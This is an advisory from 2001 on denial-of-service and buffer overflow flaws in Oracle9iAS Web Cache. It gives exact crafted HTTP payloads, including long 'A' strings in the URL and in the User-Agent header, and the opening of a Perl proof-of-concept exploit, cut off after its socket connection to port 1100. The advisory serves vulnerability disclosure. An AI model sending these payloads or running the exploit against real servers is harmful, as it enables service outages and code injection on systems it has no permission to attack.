Oracle9iAS Web Cache Multiple DoS and Buffer Overflow
20 Oct. 2001
Summary
Oracle9iAS Release 2.0.0.1.0 (previous releases may also be affected), contain a URL driven buffer overrun condition that can cause process exiting, process hanging or injection of malicious code.
Vulnerable systems:
Oracle9iAS Web Cache version 2.0.0.1.0
A simple URL driven denial of service or buffer overflow condition occurs when a very long text string is sent to the web service. This occurs on all four web services that the Oracle9iAS Web Cache software provides. The four services are by default run on:
Port 1100 = Incoming web cache proxy.
Port 4000 = Administrative interface.
Port 4001 = Web XML invalidation port.
Port 4002 = Statistics port.
Buffer overflow condition:
When sending a request containing / + 'A' x 3095 + 'N' x 4, the process terminates with the with the following state dump:
Denial of service:
Upon sending a string longer then 3570 characters, the process simply exists without stack dump:
'GET /<3571 x A> HTTP/1.0'
The following three denial of service attacks result in the process hanging and the CPU usage of 100%. A reboot is required in order to terminate the hanging processes:
- When sending a string containing approximately 3094 characters.
- When sending more approximately 4000 characters in the HTTP header. User-Agent is one of the verified headers where this condition exists.
'GET / HTTP/1.0'
'User-Agent: <4000 x A>'
- Sending the following request (this only affects the webcache admin interface):
'GET /. HTTP/1.0'
Exploit:
####################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
####################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
